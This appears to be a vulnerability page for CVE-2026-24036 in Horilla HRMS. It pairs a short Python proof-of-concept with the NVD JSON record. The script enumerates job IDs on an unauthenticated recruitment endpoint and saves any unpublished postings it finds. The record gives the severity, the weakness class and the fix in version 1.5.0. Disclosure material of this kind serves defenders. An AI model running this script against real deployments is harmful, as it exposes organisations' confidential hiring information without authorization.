CVE-2026-24036

import requests # CVE-2026-24036 PoC - Unauthenticated access to unpublished job postings # Target: Horilla HRMS < 1.5.0 target_url = input("Enter target URL (e.g., http://target.com): ") # Try to access recruitment details endpoint without authentication for job_id in range(1, 100): url = f"{target_url}/recruitment/recruitment-details/{job_id}/" try: response = requests.get(url, timeout=10) if response.status_code == 200: # Check if response contains unpublished job information if "draft" in response.text.lower() or "job_title" in response.text: print(f"[!] Found unpublished job posting at ID: {job_id}") print(f"[+] URL: {url}") print(f"[+] Response length: {len(response.text)} bytes") # Save response for analysis with open(f"job_{job_id}_response.html", "w") as f: f.write(response.text) print(f"[+] Response saved to job_{job_id}_response.html") except requests.exceptions.RequestException as e: print(f"[-] Error accessing {url}: {e}") print("[*] Scan completed.")

{"cve": {"id": "CVE-2026-24036", "sourceIdentifier": "[email protected]", "published": "2026-01-22T04:15:59.597", "lastModified": "2026-01-29T18:58:16.100", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Horilla is a free and open source Human Resource Management System (HRMS). Versions 1.4.0 and above expose unpublished job postings through the /recruitment/recruitment-details// endpoint without authentication. The response includes draft job titles, descriptions and application link allowing unauthenticated users to view unpublished roles and access the application workflow for unpublished jobs. Unauthorized access to unpublished job posts can leak sensitive internal hiring information and cause confusion among candidates. This issue has been fixed in version 1.5.0."}, {"lang": "es", "value": "Horilla es un Sistema de Gestión de Recursos Humanos (HRMS) de código abierto y gratuito. Las versiones 1.4.0 y superiores exponen ofertas de empleo no publicadas a través del endpoint /recruitment/recruitment-details// sin autenticación. La respuesta incluye títulos de puestos de trabajo en borrador, descripciones y un enlace de solicitud, lo que permite a los usuarios no autenticados ver roles no publicados y acceder al flujo de trabajo de solicitud para trabajos no publicados. El acceso no autorizado a las ofertas de empleo no publicadas puede filtrar información interna de contratación sensible y causar confusión entre los candidatos. Este problema ha sido solucionado en la versión 1.5.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:horilla:horilla:1.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "55143854-C369-4CAA-B671-90EFC9170F64"}]}]}], "references": [{"url": "https://github.com/horilla-opensource/horilla/commit/9a585a1588431499092a49d7e82cb77daa4d99ee", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/horilla-opensource/horilla/releases/tag/1.5.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/horilla-opensource/horilla/security/advisories/GHSA-q4xr-w96p-3vg7", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}